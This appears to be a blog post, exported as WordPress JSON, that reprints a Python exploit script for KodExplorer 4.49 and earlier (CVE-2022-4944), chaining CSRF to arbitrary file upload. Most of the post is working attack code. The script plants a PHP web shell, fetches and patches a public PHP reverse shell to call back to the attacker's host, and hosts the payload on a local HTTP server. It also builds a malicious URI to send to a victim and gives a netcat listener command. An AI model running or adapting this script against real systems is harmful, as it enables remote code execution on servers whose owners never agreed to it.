# Exploit Title: KodExplorer <= 4.49 – CSRF to Arbitrary File Upload
\n# Date: 21\/04\/2023
\n# Exploit Author: Mr Empy
\n# Software Link: https:\/\/github.com\/kalcaddle\/KodExplorer
\n# Version: <= 4.49
\n# Tested on: Linux
\n# References:
\n# * https:\/\/vuldb.com\/?id.227000
\n# * https:\/\/www.cve.org\/CVERecord?id=CVE-2022-4944
\n# * https:\/\/github.com\/MrEmpy\/CVE-2022-4944<\/p>\n
import argparse
\nimport http.server
\nimport socketserver
\nimport os
\nimport threading
\nimport requests
\nfrom time import sleep<\/p>\n
def banner():
\nprint(”’
\n_ _____________ _____ _ ______ _____
\n_____
\n| | \/ \/ _ | _ \\ ___| | | | ___ \\\/ __ \\|
\n___|
\n| |\/ \/| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_\/ \/| \/ \\\/|
\n|__
\n| \\| | | | | | | __\\ \\\/ \/ ‘_ \\| |\/ _ \\| ‘__\/ _ \\ ‘__| | \/ | | |
\n__|
\n| |\\ \\ \\_\/ \/ |\/ \/| |___> <| |_) | | (_) | | | __\/ | | |\\ \\ | \\__\/\\|
\n|___
\n\\_| \\_\/\\___\/|___\/ \\____\/_\/\\_\\ .__\/|_|\\___\/|_| \\___|_| \\_| \\_|
\n\\____\/\\____\/
\n| |<\/p>\n
|_|<\/p>\n
[KODExplorer <= v4.49 Remote Code Executon]\n[Coded by MrEmpy]\n
”’)<\/p>\n
def httpd():
\nport = 8080
\nhttpddir = os.path.join(os.path.dirname(__file__), ‘http’)
\nos.chdir(httpddir)
\nHandler = http.server.SimpleHTTPRequestHandler
\nhttpd = socketserver.TCPServer((”, port), Handler)
\nprint(‘[+] HTTP Server started’)
\nhttpd.serve_forever()<\/p>\n
def webshell(url, lhost):
\npayload = ‘<pre><?php system($_GET[“cmd”])?><\/pre>’
\npath = ‘\/data\/User\/admin\/home\/’<\/p>\n
targetpath = input(‘[*] Target KODExplorer path (ex \/var\/www\/html): ‘)
\nwshell_f = open(‘http\/shell.php’, ‘w’)
\nwshell_f.write(payload)
\nwshell_f.close()
\nprint(‘[*] Opening HTTPd port’)
\nth = threading.Thread(target=httpd)
\nth.start()
\nprint(f'[+] Send this URI to your target:
\n{url}\/index.php?explorer\/serverDownload&type=download&savePath={targetpath}\/data\/User\/admin\/home\/&url=http:\/\/
\n{lhost}:8080\/shell.php&uuid=&time=’)
\nprint(f'[+] After the victim opens the URI, his shell will be hosted at
\n{url}\/data\/User\/admin\/home\/shell.php?cmd=whoami’)<\/p>\n
def reverseshell(url, lhost):
\nrvpayload = ‘
\nhttps:\/\/raw.githubusercontent.com\/pentestmonkey\/php-reverse-shell\/master\/php-reverse-shell.php
\n‘
\npath = ‘\/data\/User\/admin\/home\/’<\/p>\n
targetpath = input(‘[*] Target KODExplorer path (ex \/var\/www\/html): ‘)
\nlport = input(‘[*] Your local port: ‘)
\nreqpayload = requests.get(rvpayload).text
\nreqpayload = reqpayload.replace(‘127.0.0.1’, lhost)
\nreqpayload = reqpayload.replace(‘1234’, lport)
\nwshell_f = open(‘http\/shell.php’, ‘w’)
\nwshell_f.write(reqpayload)
\nwshell_f.close()
\nprint(‘[*] Opening HTTPd port’)
\nth = threading.Thread(target=httpd)
\nth.start()
\nprint(f'[+] Send this URI to your target:
\n{url}\/index.php?explorer\/serverDownload&type=download&savePath={targetpath}\/data\/User\/admin\/home\/&url=http:\/\/
\n{lhost}:8080\/shell.php&uuid=&time=’)
\ninput(f'[*] Run the command “nc -lnvp {lport}” to receive the
\nconnection and press any key\\n’)
\nwhile True:
\nhitshell = requests.get(f'{url}\/data\/User\/admin\/home\/shell.php’)
\nsleep(1)
\nif not hitshell.status_code == 200:
\ncontinue
\nelse:
\nprint(‘[+] Shell sent and executed!’)
\nbreak<\/p>\n
def main(url, lhost, mode):
\nbanner()
\nif mode == ‘webshell’:
\nwebshell(url, lhost)
\nelif mode == ‘reverse’:
\nreverseshell(url, lhost)
\nelse:
\nprint(‘[-] There is no such mode. Use webshell or reverse’)<\/p>\n
if __name__ == “__main__”:
\nparser = argparse.ArgumentParser()
\nparser.add_argument(‘-u’,’–url’, action=’store’, help=’target url’,
\ndest=’url’, required=True)
\nparser.add_argument(‘-lh’,’–local-host’, action=’store’, help=’local
\nhost’, dest=’lhost’, required=True)
\nparser.add_argument(‘-m’,’–mode’, action=’store’, help=’mode
\n(webshell, reverse)’, dest=’mode’, required=True)
\narguments = parser.parse_args()
\nmain(arguments.url, arguments.lhost, arguments.mode)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: KodExplorer <= 4.49 – CSRF to Arbitrary File Upload # Date: 21\/04\/2023 # Exploit Author: Mr Empy # Software Link: https:\/\/github.com\/kalcaddle\/KodExplorer # Version: <= 4.49 # Tested on: Linux # References: # * https:\/\/vuldb.com\/?id.227000 # * https:\/\/www.cve.org\/CVERecord?id=CVE-2022-4944 # * https:\/\/github.com\/MrEmpy\/CVE-2022-4944 import argparse import http.server import socketserver import os import threading import requests …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40688","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40688"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40688\/revisions"}],"predecessor-version":[{"id":40739,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40688\/revisions\/40739"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}